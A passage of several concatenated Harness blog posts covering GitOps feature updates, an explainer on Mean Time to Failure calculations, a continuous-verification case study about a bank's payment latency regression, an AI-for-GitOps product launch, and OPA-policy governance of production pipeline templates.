AI-powered operations management brings natural language queries and intelligent automation to GitOps applications, AppSets, and clusters. Ask questions like "What applications are out of sync?" or "Which syncs failed in the past 24 hours?" and get instant answers drawn from your entire GitOps deployment landscape. The AI agent can also trigger operations—such as syncing all applications managing non-prod services with a single command or generating pipeline snippets for common GitOps workflows. This transforms dashboards and manual queries into conversational operations management, making GitOps accessible to platform teams, developers, and operators alike.
Learn more about AI-powered GitOps →
GitOps applications now integrate with Harness's centralized notification framework, bringing the same notification capabilities available for pipelines to your GitOps workflows. Track application sync events—start, complete, success, and failure—alongside ApplicationSet creation, sync, and error events through Slack, email, PagerDuty, Microsoft Teams, or any webhook-compatible system. Configure notification rules at the account, organization, or project level using the same interface you already use for pipeline notifications.
Learn more about GitOps notifications →
GitOps PR-based workflows get two key improvements. The Update Release Repo step can now block until the raised PR is merged, eliminating the need for separate Merge PR steps and manual approval stage coordination—the step creates the PR, waits for review, and proceeds once merged. Squash and Merge Support brings native squash-and-merge strategies to the Merge PR step, working with GitHub App tokens and following your repository's configured merge strategies to maintain a clean, linear repository history.
Learn more about PR pipelines →
The features highlighted in this update are available now in Harness CD and GitOps. Ready to see them in action? We've created a comprehensive video playlist that walks through these capabilities, featuring live demos and configuration guides.
Watch the Q1 2026 Feature Playlist →
From AI-powered verification that understands your deployments from day one to Windows performance breakthroughs and GitOps workflow enhancements, this quarter delivers capabilities that eliminate configuration overhead, expand platform coverage, and align with how modern teams ship software.
Explore the documentation links throughout this post to dive deeper into each feature, or reach out to your Harness account team to discuss how these capabilities can accelerate your delivery workflows.
What's coming next? Q2 2026 will bring deeper integrations with cloud-native platforms, expanded AI capabilities across the deployment lifecycle, and continued investment in developer experience improvements. Stay tuned for more updates—we're just getting started.
Your production problems aren't just random. If a Kubernetes node fails every 72 hours or your CI runners crash every 4 builds, that's a clear pattern. Mean Time to Failure (MTTF) turns these failures into data that you can control, plan for, and improve over time.
MTTF should not be a decoration on a dashboard for platform engineering leaders; it should be a decision-making tool. With the right calculations, you can set realistic SLOs, plan capacity, and cut down on developer work by focusing on the parts that break the most often. You'll get exact formulas for distributed systems, data collection patterns that avoid common mistakes, and a playbook to turn reliability improvements into measurable ROI through automated resilience practices alongside faster recovery metrics.
Stop letting unpredictable failures drain your team's time and budget. With Harness Continuous Integration and Continuous Delivery, you can turn MTTF insights into concrete pipeline changes, progressive delivery strategies, and guardrails that keep reliability improving release after release.
Mean Time to Failure (MTTF) is the average operating time of non-repairable components before failure across a population.
At a basic level:
MTTF = total operating time ÷ number of failures
If 100 CI runners each run for 50 hours during a week (5,000 runner‑hours total) and 20 runners experience at least one hard failure, then:
MTTF = 5,000 ÷ 20 = 250 hours
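As a minimal sketch, the same calculation in Python looks like this. The function name `mttf_hours` is illustrative, and the numbers are the CI runner figures from the example above.

```python
def mttf_hours(total_operating_hours: float, failures: int) -> float:
    """Mean Time to Failure = total operating time / number of failures."""
    if failures <= 0:
        # With zero observed failures the ratio is undefined, not infinite.
        raise ValueError("MTTF needs at least one observed failure")
    return total_operating_hours / failures


runner_hours = 100 * 50  # 100 runners x 50 hours each = 5,000 runner-hours
print(mttf_hours(runner_hours, 20))  # 250.0
```

Raising on zero failures is a deliberate choice here: a window with no failures is incomplete data, not evidence that the component never fails.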
Historically, MTTF is used for physical assets you replace instead of fix (light bulbs, disks, sealed devices). In software, the same concept fits ephemeral resources such as:
MTTF tells you how long things run, on average, before they fail and must be replaced. MTTF is an approximation, not a strict reliability model.
Three reliability metrics show up in every platform review:
Use them to answer different questions:
For example:
Your platform scorecards should display all three together, alongside SLO health and error budget burn, so teams see the full reliability picture instead of optimizing a single metric in isolation.
The theoretical rules around MTTF and MTBF are straightforward; the ambiguity comes when you apply them to real cloud‑native stacks. Concrete examples help.
These components typically behave like non‑repairable items:
For each of these, you can treat a single lifecycle (from start to failure/termination) as one observation in your MTTF dataset.
These components behave more like classic repairable systems:
For these, you care more about how much uptime you get between failures (MTBF) and how quickly you can restore full health (MTTR).
It is tempting to say “our nodes have an MTTF of 720 hours, so our service is very reliable.” That is only true if your architecture masks those failures from users. User‑facing reliability lives at the service boundary, measured via SLOs and error budgets; component MTTF is an input that helps you:
MTTF helps you understand where things break; SLOs and MTTR tell you how much that matters to customers.
The MTTF calculation is trivial. The work is in collecting honest data across a distributed system without losing important details.
For each component type, decide exactly what counts as “failed,” for example:
Document these in your platform taxonomy so every team logs and reports failures the same way.
For each instance in the population you’re measuring, capture:
Then compute:
MTTF = total operating time across all instances ÷ number of failed instances
This gives you MTTF for that class (e.g., “Linux GPU runners in prod”).
Never pool dissimilar components into a single MTTF number. Instead:
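Example: one class accumulates 1,000 operating hours with 5 failures (MTTF 200 hours), and another accumulates 100 operating hours with 1 failure (MTTF 100 hours).
Fleet MTTF (weighted) = (1,000 + 100) ÷ (5 + 1) ≈ 183 hours, not the naive (200 + 100) ÷ 2 = 150 hours.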
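The difference between the weighted and naive figures is easy to reproduce. The sketch below assumes the two classes implied by the arithmetic above (1,000 hours with 5 failures, and 100 hours with 1 failure); the class names are placeholders.

```python
from dataclasses import dataclass


@dataclass
class ComponentClass:
    name: str               # placeholder label, not from the source
    operating_hours: float  # total exposure for the class
    failures: int           # failed instances in the class

    @property
    def mttf(self) -> float:
        return self.operating_hours / self.failures


def fleet_mttf(classes) -> float:
    """Weight by exposure: sum the hours and the failures, then divide once."""
    total_hours = sum(c.operating_hours for c in classes)
    total_failures = sum(c.failures for c in classes)
    return total_hours / total_failures


classes = [
    ComponentClass("class_a", operating_hours=1_000, failures=5),  # MTTF 200 h
    ComponentClass("class_b", operating_hours=100, failures=1),    # MTTF 100 h
]

weighted = fleet_mttf(classes)
naive = sum(c.mttf for c in classes) / len(classes)
print(round(weighted), naive)  # 183 150.0
```

The naive average gives the small class the same weight as the large one, which is why it understates the fleet figure here.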
Some instances will still be running when you take the snapshot. If you drop them:
When censored samples are common, use basic survival analysis (like Kaplan–Meier) so that "still running" instances add to the exposure instead of being thrown away. If you give them clear timestamps and labels, observability tools and data teams can usually take care of this for you.
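To make the effect of censoring concrete, here is a small, dependency-free sketch of a Kaplan–Meier estimate alongside an exposure-based MTTF. The observations are made-up illustration data, and `kaplan_meier` and `exposure_mttf` are hypothetical helper names; in practice a statistics library would normally do this work.

```python
def kaplan_meier(observations):
    """observations: list of (hours, failed). failed=False means still running
    (right-censored). Returns [(time, survival_probability)] at each failure time."""
    ordered = sorted(observations)
    at_risk = len(ordered)
    survival = 1.0
    curve = []
    i = 0
    while i < len(ordered):
        t = ordered[i][0]
        failures_at_t = 0
        leaving_at_t = 0
        # Group every observation that ends at time t.
        while i < len(ordered) and ordered[i][0] == t:
            failures_at_t += 1 if ordered[i][1] else 0
            leaving_at_t += 1
            i += 1
        if failures_at_t:
            survival *= 1 - failures_at_t / at_risk
            curve.append((t, survival))
        # Censored instances leave the risk set without counting as failures.
        at_risk -= leaving_at_t
    return curve


def exposure_mttf(observations):
    """Total hours from ALL instances divided by the number of failures."""
    total_hours = sum(hours for hours, _ in observations)
    failures = sum(1 for _, failed in observations if failed)
    return total_hours / failures


# Illustrative data: two failed instances, two still running at snapshot time.
observations = [(10, True), (20, False), (30, True), (40, False)]
failed_only = [o for o in observations if o[1]]

print(kaplan_meier(observations))   # [(10, 0.75), (30, 0.375)]
print(exposure_mttf(observations))  # 50.0
print(exposure_mttf(failed_only))   # 20.0 (censored instances dropped)
```

Dropping the two running instances cuts the estimate from 50 to 20 hours in this toy data set, because the hours they survived are thrown away along with them.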
MTTF becomes strategically important when you use it to shape SLOs, error budgets, and reliability investments, not just track uptime.
If a class of components has an MTTF of 72 hours, a single instance will fail about:
8,760 hours/year ÷ 72 ≈ 122 failures/year
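The same arithmetic extends to a fleet. The sketch below assumes instances run continuously and fail independently at a constant average rate, which is a simplification; the fleet size of 10 is an arbitrary illustration.

```python
HOURS_PER_YEAR = 8_760


def expected_failures_per_year(mttf_hours: float, instances: int = 1) -> float:
    """Expected failures per year for `instances` components that run all year."""
    if mttf_hours <= 0:
        raise ValueError("MTTF must be positive")
    return instances * HOURS_PER_YEAR / mttf_hours


single = expected_failures_per_year(72)
fleet = expected_failures_per_year(72, instances=10)  # hypothetical fleet size
print(f"{single:.1f} {fleet:.0f}")  # 121.7 1217
```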
With multiple instances and redundancy, not every failure becomes a user‑visible incident, but you can still estimate:
MTTF highlights which components generate excessive manual work:
Use this to:
Because MTTF underpins incident rates, any improvement can be tied to measurable gains:
Treat MTTF as a leading indicator: when you raise it on critical components, you should see downstream improvements in SLO attainment and delivery cadence.
Once you know which components have the lowest MTTF and the highest operational cost, you can systematically improve them. In modern delivery pipelines, four patterns tend to pay off quickly.
Flaky CI is one of the most common sources of low MTTF and wasted engineering time.
You can improve CI‑related MTTF by:
Result: higher MTTF for pipelines and runners, fewer broken builds, and fewer interruptions for developers.
You cannot prevent every bad change, but you can limit how many become full‑blown incidents that count against your service‑level MTTF.
Key tactics:
This keeps effective MTTF for user‑facing services higher, even if underlying components still fail regularly.
Many MTTF regressions start as “just one more config change” that slips past informal reviews. Prevent those with:
This ensures the MTTF gains you’ve earned are not eroded by ad‑hoc changes and one‑off exceptions.
To sustainably raise MTTF, you need confidence that your architecture and runbooks can handle real failures, not just happy‑path tests.
By running targeted chaos experiments on the components with the lowest MTTF, you can:
When failures happen, MTTF tells you how often they occur. AI‑powered automation helps you decide what to do next—fast—so more failures stay under control and never become major incidents.
Harness AI‑assisted deployment verification analyzes metrics and logs during and after each deployment:
The result is fewer deployments turning into user‑visible failures and a higher effective MTTF for your services, because many problematic changes are automatically rolled back before customers notice.
On the CI side, AI‑driven analysis works with Test Intelligence and analytics to:
SLOs and error budgets turn raw data into rules. Instead of making teams watch dashboards and make decisions on their own, you can:
This completes the cycle: MTTF informs SLO design. Guardrails are based on SLOs, and AI-powered verification and rollbacks work on those guardrails at machine speed.
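One way to picture an SLO-driven guardrail is a small policy function that converts error budget burn into a deployment decision. This is a generic sketch rather than a Harness feature: the function names, the 25% threshold, and the three policy outcomes are all assumptions chosen for illustration.

```python
def error_budget_remaining(slo_target: float, total_requests: int,
                           failed_requests: int) -> float:
    """Fraction of the error budget still unspent (negative if overspent)."""
    allowed_failures = (1.0 - slo_target) * total_requests
    if allowed_failures <= 0:
        raise ValueError("SLO target leaves no error budget to measure against")
    return 1.0 - failed_requests / allowed_failures


def deployment_policy(remaining: float, approval_below: float = 0.25) -> str:
    """Map remaining budget to a rule. Threshold is an illustrative assumption."""
    if remaining <= 0:
        return "block"             # budget exhausted: reliability work only
    if remaining < approval_below:
        return "require_approval"  # budget nearly spent: add a human checkpoint
    return "allow"


# 99.9% SLO over 1,000,000 requests allows roughly 1,000 failed requests.
healthy = error_budget_remaining(0.999, 1_000_000, 200)
strained = error_budget_remaining(0.999, 1_000_000, 800)
exhausted = error_budget_remaining(0.999, 1_000_000, 1_200)

for remaining in (healthy, strained, exhausted):
    print(deployment_policy(remaining))
# allow
# require_approval
# block
```

Encoding the rule as code means the decision is made the same way every time, instead of depending on who happens to be watching the dashboard.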
Want to turn MTTF insights into automated reliability improvements?
Explore Harness CI/CD to reduce failure rates, enforce guardrails, and improve SLO performance.
MTTF can feel abstract until you have to justify reliability decisions or explain incident patterns to stakeholders. These FAQs break down the most common questions practitioners ask about MTTF and how it relates to other reliability metrics.
MTTF is the average time it takes for a group of parts, like pods or temporary CI runners, to fail in a way that can't be fixed. MTBF tells you how long systems you fix and put back into service, like databases or long-running services, are up and running before they break down again.
When you need to know how often failures happen so you can plan for redundancy or auto-healing, use MTTF. Use MTTR to find out how quickly you can fix services that users can see after they go down. Both metrics work together and are usually used to help make decisions about SLOs and error budgets.
MTTF estimates are very uncertain when there aren't many failures. To make the number more reliable, put similar workloads together, add up the exposure hours for each class, and think of MTTF as a range or trend instead of a single point. If a part didn't fail in your window, don't assume that it will never fail; instead, treat that as incomplete data.
Most of the time, MTTF is skewed by dropping instances that are still running when the measurement is taken (right-censoring), combining environments (staging, load, and production) into one metric, and having different or unclear definitions of failure across teams. Fixing these problems usually makes MTTF more useful than any other advanced statistical method.
MTTF is less useful when failures are highly correlated (many instances failing together from a shared cause) or when you're measuring systems that are repaired instead of replaced. In those cases, MTBF and MTTR, when looked at through SLOs and error budgets, usually give better guidance than a single MTTF value.
When the MTTF is higher on important parts, there are fewer problems, fewer pages, and less time lost by developers fixing them. You can link improvements directly to faster safe release velocity, lower downtime risk, and lower operational costs when you combine MTTF with SLOs, error budgets, chaos engineering, and AI-powered automation.


Modern engineering teams have become exceptionally good at shipping software quickly.
With modern CI/CD platforms, what once required careful coordination, late-night release windows, and layers of approvals now happens almost invisibly. Pipelines execute in minutes. Releases flow continuously. The friction that once slowed everything down has been engineered away.
From the outside, it looks like progress in its purest form. Automation removed bottlenecks. Cloud infrastructure removed limits. Pipelines removed human delay. But beneath that acceleration, there is a quieter reality that only reveals itself at the worst possible moment.
Speed does not guarantee safety. And more importantly, speed does not guarantee confidence. Most teams today can answer one question with absolute certainty:
Did the deployment succeed?
Green pipeline. All checks passed. No errors.
But when you ask slightly different questions, the answers become far less certain:
Did the deployment actually make the system better? And more importantly - did it improve customer experience, accelerate transactions, and drive business outcomes, or did it quietly degrade performance and impact revenue?
That difference may sound subtle, but in practice, it is where reliability either exists - or quietly breaks. This gap between deployment success and validated system behavior is exactly where continuous verification becomes critical.
And nowhere has this been more evident than in a financial services transformation I witnessed firsthand, where a perfectly “successful” deployment slowly degraded a live payment system without anyone noticing.
A large global bank was deep into modernizing its digital payment platform. They were not experimenting. They were executing at scale. Their architecture was exactly what you would expect from a mature engineering organization: Kubernetes-based microservices, fully automated CD pipelines, infrastructure defined as code, and testing embedded across every stage. Over time, they had achieved something remarkable. Deployments had become routine. What once required weekend coordination and careful planning was now happening several times a day, almost without discussion. Releases were no longer events. They were background activities.
Their typical deployment pipeline looked something like this:
Build → Security scan → Integration tests → Deploy → Smoke tests

Build flowing into security scanning, into integration testing, then deployment, followed by smoke tests. It was elegant. Automated. The kind of pipeline you would proudly present at a conference. And for a while, it worked perfectly. Until one Friday afternoon…
A new version of the transaction validation service was deployed.
The release pipeline executed flawlessly.
Every step reported success.
The pipeline marked the deployment as successful. The release moved forward. Engineers moved on to other tasks. But about twenty minutes later, something subtle began to happen. Payment processing latency began creeping upward. At first it was small.
Then the following symptoms appeared:
Nothing catastrophic happened. The system did not crash. Pods did not fail. Containers did not restart. From the perspective of Kubernetes, everything looked healthy.
But the platform was slowly degrading. Revenue and customer experience were definitely impacted. Because the pipeline had already declared success, there was no mechanism to reconsider that decision. No feedback loop connecting real system behavior back into the deployment outcome.
The problem remained undetected for nearly half an hour. By the time engineers realized what was happening, the impact had already spread. Thousands of delayed transactions. Customer complaints increasing. Engineering teams pulled into urgent investigation.
The cause, when eventually identified, was deceptively simple. A small change in a database query. Slightly inefficient. Invisible under test conditions. But under real production load, it introduced just enough latency to ripple across the system.
Unit tests did not catch it. Integration tests did not catch it. Kubernetes health checks did not catch it. But the signals were there, visible in the observability platform. They simply were not part of the deployment decision.
What makes this story compelling is not that it happened. It is that it keeps happening. Over the past six months, across multiple enterprise environments, I have seen the same pattern emerge with striking consistency.
Different companies. Different industries. Different teams.
The same blind spot.
Every organization had invested heavily in observability. Their platforms were powered by tools like Datadog, Dynatrace, New Relic, AppDynamics, and Grafana.
Their systems were instrumented in depth. Metrics, logs, traces, business indicators - everything was being captured. Their dashboards were rich. Their visibility was impressive.
They could see everything. But only after the fact.
Because when I examined how deployments were validated, the story changed completely.
Pipelines relied almost exclusively on Kubernetes readiness and liveness checks, sometimes complemented by simple smoke tests. If the service started and responded, the deployment was considered successful. And that was the end of the decision process. Observability existed - but outside the pipeline.
It was a tool for humans to investigate problems, not a mechanism for the system to prevent them. In every case, the realization was the same. They had built world-class observability capabilities. But none of it was being used to decide whether a deployment should proceed.
Kubernetes health checks are essential. They are incredibly effective at keeping systems running and enabling self-healing behavior. But they were never designed to answer the question that matters most during a deployment.
They tell you whether something is alive. They tell you whether it can receive traffic. They do not tell you whether it is behaving correctly. And that distinction is where modern incidents live.
A system can be fully operational from Kubernetes’ perspective while simultaneously degrading the experience for every user interacting with it.
I have seen systems where database latency doubles without any restart. Where memory usage slowly increases over hours. Where microservices begin retrying requests in subtle feedback loops. Where queues build silently until they become bottlenecks.
All of it happening while every pod remains in a perfectly “ready” state. Kubernetes reports success. Users experience degradation. The pipeline sees green. Reality is different. This is the illusion of a successful deployment.
Continuous verification changes the nature of the question. Instead of asking whether the deployment completed, it asks whether the system is behaving as expected.
It takes the signals already present in your preferred Observability platforms and brings them directly into the pipeline itself. Now the pipeline is no longer blind. It observes latency. Error rates. Throughput. Infrastructure signals. Even business-level indicators. It compares the behavior of the new version against a known baseline. And most importantly, it acts.
If the system begins to drift away from expected behavior, even subtly, the pipeline can stop the rollout and revert to a known good state automatically. No delay. No escalation. No manual intervention.
After the incident, the platform team redesigned their approach. They integrated continuous verification using Harness with telemetry from their preferred Observability tool.
Their new pipeline looked like this:
Build → Security Scan → Integration tests → Canary deployment → Continuous verification → Promote or rollback

During the canary phase, only a small percentage of traffic was routed to the new version.
The verification step analyzed key signals including:
The system compared two sets of signals:
Baseline behavior (previous version)
versus
Canary behavior (new version)
If the canary version performed worse than the baseline, the system immediately rejected the release.
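The baseline-versus-canary comparison can be sketched as a simple relative-regression check. This is a deliberately simplified illustration, not the analysis Harness performs: the metric names, sample values, and the 10% tolerance are assumptions, every metric is treated as "higher is worse", and a production verifier would use statistical comparison over time series rather than single numbers.

```python
def canary_verdict(baseline: dict, canary: dict, max_regression: float = 0.10):
    """Return ("promote" | "rollback", regressions) for higher-is-worse metrics."""
    regressions = {}
    for name, base_value in baseline.items():
        canary_value = canary[name]
        if base_value == 0:
            # Any increase from a zero baseline counts as an unbounded regression.
            change = float("inf") if canary_value > 0 else 0.0
        else:
            change = (canary_value - base_value) / base_value
        if change > max_regression:
            regressions[name] = change
    return ("rollback" if regressions else "promote"), regressions


# Illustrative numbers only.
baseline = {"p95_latency_ms": 200.0, "error_rate": 0.010}
slow_canary = {"p95_latency_ms": 260.0, "error_rate": 0.010}
healthy_canary = {"p95_latency_ms": 205.0, "error_rate": 0.010}

print(canary_verdict(baseline, slow_canary)[0])     # rollback
print(canary_verdict(baseline, healthy_canary)[0])  # promote
```

In the slow canary the service is still up and would pass a readiness probe; only the comparison against baseline behavior exposes the 30% latency regression.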
Two weeks later, another release was pushed. This time, the sequence unfolded differently. The canary deployment began. Traffic started flowing. Observability data was analyzed in real time. Within minutes, a deviation appeared. Not dramatic. Not catastrophic. But enough.
Latency began to drift beyond acceptable thresholds. This time, the pipeline saw it. And without hesitation, it rolled back. No incident. No escalation. No customer impact. Just a silent correction, executed automatically. The kind of outcome most users will never notice - but that defines operational excellence.
Traditional pipelines answer a binary question.
Did the code deploy?
Continuous verification answers the questions that actually matter.
Did the system behave correctly after deployment? Did it improve customer experience?
In modern systems - distributed, dynamic, deeply interconnected - failures rarely present themselves as crashes. They appear as degradation. And if your pipeline cannot detect degradation, it is only solving half the problem. Continuous verification transforms observability into an automated safety gate for releases. It closes the loop.
After implementing continuous verification, the platform team observed significant improvements. But the most important improvement was not technical. It was cultural. Engineers regained the confidence to deploy frequently without fear of hidden regressions.
Modern DevSecOps practices have matured significantly. We validate security. We enforce compliance. We ensure code quality. But we still tend to stop validation at the moment of deployment. Continuous verification extends that validation into real system behavior. It transforms the pipeline into a closed loop. Not just build, test, deploy. But build, test, deploy, verify. And that final step is where trust is established.
The most advanced engineering organizations are already evolving toward a new model. Deployment decisions are no longer based solely on pre-release validation. They are informed by live system behavior.
Observability is no longer a dashboard. It becomes part of the control system.
Platforms like Harness, integrated with your Observability tools, are enabling this shift. And once teams adopt this model, the difference is profound.
Continuous delivery solved the problem of speed. Continuous verification solves the problem of confidence.
If your pipeline stops when deployment succeeds, you are still operating with incomplete information. Because in modern software delivery, success is not defined by whether something was deployed. It is defined by whether that deployment made the system better.
And the only reliable way to answer that - automatically, consistently, and at scale - is through continuous verification. Start treating observability as a release gate - not just a dashboard!


Innovation is moving faster than ever, but software delivery has become the ultimate chokepoint. While AI coding assistants have flooded our repositories with an unprecedented volume of code, the teams responsible for actually delivering that code, our Platform and DevOps engineers, are often left drowning in manual toil.
If you’re managing Argo CD at an enterprise scale, you’re painfully familiar with the "Day 2" reality. It can become tab fatigue as a service: jumping between dozens of instances, chasing out-of-sync applications, and manually diffing YAML just to figure out where your configuration drifted.
Today, we are thrilled to introduce AI for Harness GitOps. It’s an agentic intelligence layer designed to help you manage, monitor, and troubleshoot your entire GitOps estate through simple, natural language.
Standard GitOps tools are excellent at syncing state, but they often lack the high-level orchestration required by complex enterprises. When an application goes out of sync, you shouldn't have to click through multiple tabs and clusters just to find out why.
With AI for GitOps, Harness brings a new level of context-aware, agentic intelligence to your delivery lifecycle:
We built this because scaling GitOps shouldn't mean scaling your headcount. Our mission is to provide an Enterprise Control Plane that enhances your existing Argo investment rather than replacing it.
Platform engineering teams are often overwhelmed and understaffed. By moving from manual root cause analysis to automated reasoning and active configuration management, we free up engineers to focus on innovation rather than repetitive maintenance tasks.
By leveraging the Harness Software Delivery Knowledge Graph, our AI understands your unique workflows, policies, and ecosystem. It doesn't just show you an error; it explains it in the context of your specific environment and can proactively suggest (or execute) the configuration changes needed to resolve the issue. The goal here is to move the needle on Mean Time to Recovery (MTTR) from hours to minutes.
Here’s the thing: speed without safety is just a faster way to break things, and work more nights and weekends fixing them. Harness ensures that enterprise-grade governance is built in, not bolted on. Every AI-driven action, including configuration updates and pipeline modifications, is governed by your existing RBAC and OPA (Open Policy Agent) policies, providing an immutable audit trail for every change.
The promise of AI for developers has been held back by the limitations of the deployment pipeline. Harness AI for GitOps bridges that gap, providing a "prompt-to-production" workflow that is finally as fast as the code being written.
Simply put, it's time to stop syncing and start orchestrating. Experience the future of intelligent delivery with Harness.
Want to see it live? Get a demo.


Modern CI/CD platforms allow engineering teams to ship software faster than ever before.
Pipelines complete in minutes. Deployments that once required carefully coordinated release windows now happen dozens of times per day. Platform engineering teams have succeeded in giving developers unprecedented autonomy, enabling them to build, test, and deploy their services with remarkable speed.
Yet in highly regulated environments, especially in the financial services sector, speed alone cannot be the objective.
Control matters. Consistency matters. And perhaps most importantly, auditability matters.
In these environments, the real measure of a successful delivery platform is not only how quickly code moves through a pipeline. It is also how reliably the platform ensures that production changes are controlled, traceable, and compliant with governance standards.
Sometimes the most successful deployment pipeline is the one that never reaches production.
This is the story of how one enterprise platform team redesigned their delivery architecture to ensure that production pipelines remained governed, auditable, and secure by design.
A large financial institution had successfully adopted Harness for CI and CD across multiple engineering teams.
From a delivery perspective, the transformation looked extremely successful. Developers were productive, teams could create pipelines quickly, and deployments flowed smoothly through various non-production environments used for integration testing and validation. From the outside, the platform appeared healthy and efficient.
But during a platform architecture review, a deceptively simple question surfaced:
“What prevents someone from modifying a production pipeline directly?”
There had been no incidents. No production outages had been traced back to pipeline misconfiguration. No alarms had been raised by security or audit teams.
However, when the platform engineers examined the system more closely, they realized something concerning.
Production pipelines could still be modified manually.
In practice this meant governance relied largely on process discipline rather than platform enforcement. Engineers were expected to follow the right process, but the platform itself did not technically prevent deviations. In regulated industries, that is a risky place to be.
The platform team at the financial institution decided to rethink the delivery architecture entirely. Their redesign was guided by a simple but powerful principle:
Pipelines should be authored in a non-prod organization and executed in the production organization. If compliance required additional segregation, the team could later split the two into separate accounts.
Authoring and experimentation should happen in a safe environment. Execution should occur in a controlled one.
Instead of creating additional tenants or separate accounts, the platform team decided to go with a dedicated non-prod organization within the same Harness account. This organization effectively acted as a staging environment for pipeline design and validation.

This separation introduced a clear lifecycle for pipeline evolution.
The non-prod organization became the staging environment where pipeline templates could be developed, tested, and refined. Engineers could experiment safely without impacting production governance.
The production organization, by contrast, became an execution environment. Pipelines there were not designed or modified freely. They were consumed from approved templates.
The first guardrail introduced by the platform team was straightforward but powerful.
Production pipelines must always be created from account-level templates.
Handcrafted pipelines were no longer allowed. Project-level template shortcuts were also prohibited, ensuring that governance could not be bypassed unintentionally.
This rule was enforced directly through OPA policies in Harness.
package harness.cicd.pipeline

# Deny any pipeline whose template is not scoped to the account level.
deny[msg] {
    template_scope := input.pipeline.template.scope
    template_scope != "account"
    msg := "pipeline can only be created from account level pipeline template"
}
This policy ensured that production pipelines were standardized by design. Engineers could not create or modify arbitrary pipelines inside the production organization. Instead, they were required to build pipelines by selecting from approved templates that had been validated by the platform team.
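One subtlety is worth checking when adapting a rule like this: a comparison on the scope field alone may never fire for a pipeline that carries no template reference at all. The Python sketch below mirrors the intent of the rule for local experimentation. It is not Harness code. The document shape (`pipeline.template.scope`) is taken from the policy above, while `check_pipeline` and the sample documents are hypothetical.

```python
from typing import Any

DENY_MSG = "pipeline can only be created from account level pipeline template"


def check_pipeline(doc: dict[str, Any]) -> list[str]:
    """Return deny messages for a pipeline document (empty list means allowed)."""
    pipeline = doc.get("pipeline") or {}
    template = pipeline.get("template")
    # Handcrafted pipeline: no template reference at all.
    if not isinstance(template, dict):
        return [DENY_MSG]
    # Template present but not account-scoped (for example, project level).
    if template.get("scope") != "account":
        return [DENY_MSG]
    return []


# Hypothetical sample documents for the three cases discussed in the text.
handcrafted = {"pipeline": {"stages": []}}
project_level = {"pipeline": {"template": {"scope": "project"}}}
approved = {"pipeline": {"template": {"scope": "account"}}}

for name, doc in [("handcrafted", handcrafted),
                  ("project_level", project_level),
                  ("approved", approved)]:
    print(name, "->", check_pipeline(doc) or "allowed")
```

Writing the three cases down as fixtures like this makes it easy to confirm that a policy change still rejects both handcrafted pipelines and project-level shortcuts.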
As a result, production pipelines ceased to be ad-hoc configurations. They became governed platform artifacts.
Blocking unsafe pipelines in production was only part of the solution.
The platform team realized it would be even more effective to prevent non-compliant pipelines earlier in the lifecycle.
To accomplish this, they implemented structural guardrails within the non-prod organization used for pipeline staging. Templates could not even be saved unless they satisfied specific structural requirements defined by policy.
For example, templates were required to include mandatory stages, compliance checkpoints, and evidence collection steps necessary for audit traceability.
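package harness.ci_cd

# Deny templates that define no stages at all.
deny[msg] {
    input.templates[_].stages == null
    msg := "Template must have necessary stages defined"
}

# Deny templates that lack the mandatory Evidence_Collection stage.
# Assumes each entry in `stages` is a stage name string.
deny[msg] {
    some i
    stages := input.templates[i].stages
    not contains_stage(stages, "Evidence_Collection")
    msg := "Template must have necessary stages defined"
}

contains_stage(stages, name) {
    stages[_] == name
}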
These guardrails ensured that every template contained required compliance stages such as Evidence Collection, making it impossible for teams to bypass mandatory governance steps during pipeline design.
Governance, in other words, became embedded directly into the pipeline architecture itself.
The next question the platform team addressed was where the canonical version of pipeline templates should reside.
The answer was clear: Git must become the source of truth.
Every template intended for production usage lived inside a repository where the main branch represented the official release line.
Direct pushes to the main branch were blocked. All changes required pull requests, and pull requests themselves were subject to approval workflows that mirrored enterprise change management practices.
This model introduced peer review, immutable change history, and a clear traceability chain connecting pipeline changes to formal change management records.
For auditors and platform leaders alike, this was a significant improvement.
Once governance mechanisms were in place, the promotion workflow itself became predictable and repeatable.
Engineers first authored and validated templates within the non-prod organization used for pipeline staging. There they could test pipelines using real deployments in controlled non-production environments.
The typical delivery flow followed a familiar sequence:

After validation, the template definition was committed to Git through a branch and promoted through a pull request. Required approvals ensured that platform engineers, security teams, and change management authorities could review the change before it reached the release line.
Once merged into main, the approved template became available for pipelines running in the production organization. Platform administrators ensured that naming conventions and version identifiers remained consistent so that teams consuming the template could easily track its evolution.
Finally, product teams created their production pipelines simply by selecting the approved template. Any attempt to bypass the template mechanism was automatically rejected by policy enforcement.
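The approval step in this workflow can be pictured as a small gate. The sketch below is a minimal illustration, not the institution's actual tooling: the reviewer group names and the `PullRequest` shape are hypothetical, chosen to match the three groups mentioned above (platform engineers, security teams, and change management authorities).

```python
from dataclasses import dataclass, field

# Hypothetical reviewer groups, named after the roles described in the text.
REQUIRED_GROUPS = frozenset({"platform", "security", "change-management"})


@dataclass
class PullRequest:
    target_branch: str
    approvals: set[str] = field(default_factory=set)  # groups that approved


def missing_approvals(pr: PullRequest) -> set[str]:
    """Groups that still need to approve before the template can be merged."""
    return set(REQUIRED_GROUPS - pr.approvals)


def can_promote(pr: PullRequest) -> bool:
    """A template is promotable only through a fully approved PR into main."""
    return pr.target_branch == "main" and not missing_approvals(pr)


pr = PullRequest(target_branch="main", approvals={"platform", "security"})
print(can_promote(pr), missing_approvals(pr))
```

In practice this logic usually lives in the Git provider's branch protection settings rather than in custom code; the sketch only makes the rule explicit.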
Several months after the new architecture had been implemented, an engineer attempted to modify a deployment pipeline directly inside the production organization.
Under the previous architecture, that change would have succeeded immediately.
But now the platform rejected it. The pipeline violated the OPA rule because it was not created from an approved account-level template.
Instead of modifying the pipeline directly, the engineer followed the intended process: updating the template within the non-prod organization, submitting a pull request, obtaining the necessary approvals, merging the change to Git main, and then consuming the updated template in production.
The system had behaved exactly as intended. It prevented uncontrolled change in production.
The architecture introduced by the large financial institution delivered several key guarantees.
Production pipelines are standardized because they originate only from platform-approved templates. Governance is preserved because Git main serves as the official release line for pipeline definitions. Auditability improves dramatically because every pipeline change can be traced back to a pull request and associated change management approval. Finally, platform administrators retain the ability to control how templates evolve and how they are consumed in production environments.
Pipelines are often treated as simple automation scripts.
In reality they represent critical production infrastructure.
They define how code moves through the delivery system, how security scans are executed, how compliance evidence is collected, and ultimately how deployments reach production environments. If pipeline creation is uncontrolled, the entire delivery system becomes fragile.
The financial institution solved this problem with a remarkably simple model. Pipelines are built in the non-prod staging organization. Templates are promoted through Git governance workflows. Production pipelines consume those approved templates.
Nothing more. Nothing less.
Modern CI/CD platforms have dramatically accelerated the speed of software delivery.
